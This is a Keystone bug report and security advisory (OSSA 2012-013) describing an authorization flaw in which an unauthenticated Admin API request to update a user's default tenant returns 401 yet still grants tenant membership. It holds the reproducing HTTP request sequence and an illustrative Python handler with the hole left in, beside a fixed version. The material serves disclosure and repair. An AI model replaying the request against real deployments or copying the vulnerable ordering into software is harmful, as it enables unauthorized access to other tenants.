[OSSA 2012-013] Update user's default tenant partially succeeds without authz
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| OpenStack Identity (keystone) | Fix Released | Critical | Dolph Mathews | |
| Essex | Fix Released | Critical | Russell Bryant | |
| OpenStack Security Advisory | Fix Released | Undecided | Russell Bryant | |
| keystone (Ubuntu) | Fix Released | Undecided | Unassigned | |
Bug Description
Attempting to update a user's default tenant using the following API call returns unauthorized as expected, but the user is still granted "membership" on the newly specified tenant.
As a normal user against the Public API:

```http
GET http://
===
X-Auth-Token: cb81c8ba4cb6428

200 OK
======
Vary: X-Auth-Token
Content-Type: application/json

{
    "tenants": [
        {
            "id": "2636bcb347af46
            "name": "A"
        }
    ],
    "
}
```
Against the Admin API without an X-Auth-Token:

```http
PUT http://
===
Content-Type: application/json

{
    "user": {
        "tenantId": "77e165b0670144
    }
}

401 Not Authorized
===
Vary: X-Auth-Token
Content-Type: application/json

{
    "error": {
        "message": "The request you have made requires authentication.",
        "code": 401,
        "title": "Not Authorized"
    }
}
```
And the first call repeated (again, as the user in question against the Public API):

```http
GET http://
===
X-Auth-Token: cb81c8ba4cb6428

200 OK
======
Vary: X-Auth-Token
Content-Type: application/json

{
    "tenants": [
        {
            "id": "2636bcb347af46
            "name": "A"
        },
        {
            "id": "77e165b0670144
            "name": "B"
        }
    ],
    "
}
```
Note that the user's default tenant is not actually updated.
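As an added illustration (not keystone's code and not the actual fix), here is a minimal in-memory model of the Admin API's update-user handler. The vulnerable variant assumes the flaw is an ordering problem, with the tenant-membership side effect committed before the authorization check that produces the 401; the fixed variant authorizes before any state change, so a rejected request leaves nothing behind. `IdentityStore`, `assert_admin`, the token value and the user/tenant ids are all constructed for this example.

```python
class IdentityStore:
    # Constructed in-memory stand-in for the identity backend.
    def __init__(self):
        self.default_tenant = {}  # user_id -> default tenant_id
        self.memberships = {}     # user_id -> set of member tenant_ids

    def add_user_to_tenant(self, user_id, tenant_id):
        self.memberships.setdefault(user_id, set()).add(tenant_id)

    def set_default_tenant(self, user_id, tenant_id):
        self.default_tenant[user_id] = tenant_id

    def tenants_for(self, user_id):
        return sorted(self.memberships.get(user_id, set()))

def assert_admin(context):
    # Stand-in for the Admin API token check: missing or wrong token -> 401.
    if context.get("token") != "ADMIN-TOKEN":
        raise PermissionError("The request you have made requires authentication.")

def update_user_vulnerable(store, context, user_id, user):
    # Assumed ordering flaw: the membership side effect runs before the
    # authorization check, so a request answered with 401 still mutates state.
    tenant_id = user.get("tenantId")
    if tenant_id:
        store.add_user_to_tenant(user_id, tenant_id)
    assert_admin(context)
    if tenant_id:
        store.set_default_tenant(user_id, tenant_id)

def update_user_fixed(store, context, user_id, user):
    # Authorize first; every side effect sits behind the check.
    assert_admin(context)
    tenant_id = user.get("tenantId")
    if tenant_id:
        store.add_user_to_tenant(user_id, tenant_id)
        store.set_default_tenant(user_id, tenant_id)

def replay(handler):
    """Replay the report: the user is a member of tenant A, an unauthenticated
    PUT sets tenantId=B, then the user's tenant list is read back."""
    store = IdentityStore()
    store.add_user_to_tenant("user-1", "tenant-A")
    try:
        handler(store, {}, "user-1", {"tenantId": "tenant-B"})
        status = 200
    except PermissionError:
        status = 401
    return status, store.tenants_for("user-1"), store.default_tenant.get("user-1")
```

`replay(update_user_vulnerable)` reproduces the report (401 returned, membership in B gained, default tenant untouched); `replay(update_user_fixed)` returns 401 with the tenant list unchanged.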
Related branches
- Ubuntu Server Developers: Pending requested
- Diff: 13 lines (+6/-0), 1 file modified: debian/changelog (+6/-0)
- tags: added essex-backport
- Changed in keystone: status: In Progress → Fix Committed; visibility: private → public
- Changed in keystone (Ubuntu): status: New → Triaged
- Changed in keystone: status: Fix Committed → Fix Released
- Changed in keystone: milestone: folsom-rc1 → 2012.2
- summary: "Update user's default tenant partially succeeds without authz" → "[OSSA 2012-013] Update user's default tenant partially succeeds without authz"
- Changed in ossa: assignee: nobody → Russell Bryant (russellb); status: New → Fix Released
So the impact is that you can add yourself (or anyone) as a member of any tenant? Eek.
Please post patches here and not on gerrit, looks like we'll have to embargo this one.